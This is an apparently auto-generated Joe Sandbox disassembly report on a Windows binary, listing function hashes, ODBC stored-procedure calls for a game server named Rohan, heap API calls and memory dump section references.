                                                                                      • Opcode ID: 82df720037b8ad7d8165aba8d38bc8a5c64af6ca178abd200dfadc766bf15a94
                                                                                      • Instruction ID: 7802c14bae86ebac212fdc124957620583cf2ef6fdb987da56f4edd438c15551
                                                                                      • Opcode Fuzzy Hash: 82df720037b8ad7d8165aba8d38bc8a5c64af6ca178abd200dfadc766bf15a94
                                                                                      • Instruction Fuzzy Hash: B121F4B064021CB7EB20DB94CD52FD97334DB84B14F30428AF7146E2C4D9B579408BB9
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetBattlePointInfo] (?,?)},000000FD), ref: 00439350
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00439392
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004393C7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004393FF
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetBattlePointInfo] (?,?)}, xrefs: 00439347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetBattlePointInfo] (?,?)}
                                                                                      • API String ID: 0-1605249194
                                                                                      • Opcode ID: df27dc49d44d2535c4671b5981934bc37d03f41cbeb11798d8a2d759aed36b33
                                                                                      • Instruction ID: ad809a598ef748994dda59b7a1c43d2a7d222b8efc394c65ef76489ccc1617df
                                                                                      • Opcode Fuzzy Hash: df27dc49d44d2535c4671b5981934bc37d03f41cbeb11798d8a2d759aed36b33
                                                                                      • Instruction Fuzzy Hash: 112115B57A42147BEB20CB94CC52FAA7334EB44B24F10828BF7186E2C4D5B57D408F68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetAllCharCount] (?, ?)},000000FD), ref: 00439862
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004398A4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004398D9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00439911
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetAllCharCount] (?, ?)}, xrefs: 00439859
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetAllCharCount] (?, ?)}
                                                                                      • API String ID: 0-3841261170
                                                                                      • Opcode ID: 19a32777f4fb9d9e0040685151cd0403c87072fc26e21787129713a3588e387f
                                                                                      • Instruction ID: 940fcfcb64da1b1e426fdd2d375d1079013b144e0f91deca0e7ac1e0cdd53863
                                                                                      • Opcode Fuzzy Hash: 19a32777f4fb9d9e0040685151cd0403c87072fc26e21787129713a3588e387f
                                                                                      • Instruction Fuzzy Hash: 982100B1644214BBEB24CB84CC52FAA7734FB84B14F20828BF7157E2C5D6B57D408B68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_RareItemControlLog] (?,?)},000000FD), ref: 00438826
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438868
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043889D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004388D5
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_RareItemControlLog] (?,?)}, xrefs: 0043881D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_RareItemControlLog] (?,?)}
                                                                                      • API String ID: 0-3630050527
                                                                                      • Opcode ID: dbf6500cda97158269ea54afaccd451eecbdb96c785aa3cb878a772a9a400f57
                                                                                      • Instruction ID: 00ff5a2944d347354db6d65b049a3380db7c78cb65e33d79db2246f5401b3404
                                                                                      • Opcode Fuzzy Hash: dbf6500cda97158269ea54afaccd451eecbdb96c785aa3cb878a772a9a400f57
                                                                                      • Instruction Fuzzy Hash: 062118B0650214B7EB209B84CC52F697374EB84B18F10868BF7187E2C4D5B57E40CF69
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_InsertAssassinInfo] (?,?)},000000FD), ref: 00437A41
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00437A83
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437ABB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437AF0
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_InsertAssassinInfo] (?,?)}, xrefs: 00437A38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_InsertAssassinInfo] (?,?)}
                                                                                      • API String ID: 0-1768161554
                                                                                      • Opcode ID: 80560cec84f53b554e1dacc40be2313d2bc661fd1ed533905b8337703099f385
                                                                                      • Instruction ID: c4a2f6d70c84f2ffedbf9018261501a99d39a1b6c91ca73379ad5356659f81cc
                                                                                      • Opcode Fuzzy Hash: 80560cec84f53b554e1dacc40be2313d2bc661fd1ed533905b8337703099f385
                                                                                      • Instruction Fuzzy Hash: DD21FEB0685215BBFB249B44CC92FAA7334EB84B14F208389F71C3E3C5DAB569408F58
                                                                                      APIs
                                                                                        • Part of subcall function 00460F80: EnterCriticalSection.KERNEL32(?,?,?,004609FF,?,?,?,?,?,?,?,0046163D,?), ref: 00460F8E
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0046092B,?), ref: 004603F1
                                                                                      • GlobalMemoryStatus.KERNEL32(?), ref: 004603FF
                                                                                      • HeapValidate.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,0046092B,?), ref: 00460428
                                                                                        • Part of subcall function 00460FA0: LeaveCriticalSection.KERNEL32(?,?,?,00460AEB,?,?,?,?,?,?,?,?,0046163D,?), ref: 00460FAE
                                                                                      Strings
                                                                                      • Memory::_free() failed : total=%d, phys=%d, virtual=%d, xrefs: 00460414
                                                                                      • HeapValidate = %d, xrefs: 0046042F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalHeapSection$EnterFreeGlobalLeaveMemoryStatusValidate
                                                                                      • String ID: HeapValidate = %d$Memory::_free() failed : total=%d, phys=%d, virtual=%d
                                                                                      • API String ID: 3083798181-3706777688
                                                                                      • Opcode ID: 1f3981e8f430c868253ebf18b743786ced35e974c549c700a2e83b1ce9cc3976
                                                                                      • Instruction ID: fa220208c11b3a6f7274ed5c37a1ab4f49847e86d0998b625072d87a6ab01591
                                                                                      • Opcode Fuzzy Hash: 1f3981e8f430c868253ebf18b743786ced35e974c549c700a2e83b1ce9cc3976
                                                                                      • Instruction Fuzzy Hash: B801C4757002046BD628ABAA9C06F6F736CDBD4709F10042FFD0093242EAA8D91086FE
                                                                                      APIs
                                                                                      • #24.ODBC32(00000001,00000000,?), ref: 004701D3
                                                                                      • #75.ODBC32(00000000,000000C8,00000003,000000FA,00000001,00000000,?), ref: 004701FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a6a064c5f9756ab6b51bf54cae33ac13515d3e5302dde588ae0f0648a3610c8
                                                                                      • Instruction ID: 78966e7aa9fb8c42e9967553beac08d73642723ecf95e4c9e47d9c9b740e6be1
                                                                                      • Opcode Fuzzy Hash: 1a6a064c5f9756ab6b51bf54cae33ac13515d3e5302dde588ae0f0648a3610c8
                                                                                      • Instruction Fuzzy Hash: CF410F74A0520ADFDB44CF94C984BFFB7B1BF08304F20865AE419A7382D7749A41CB99
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %08x$%08x:$%s
                                                                                      • API String ID: 2111968516-2835590159
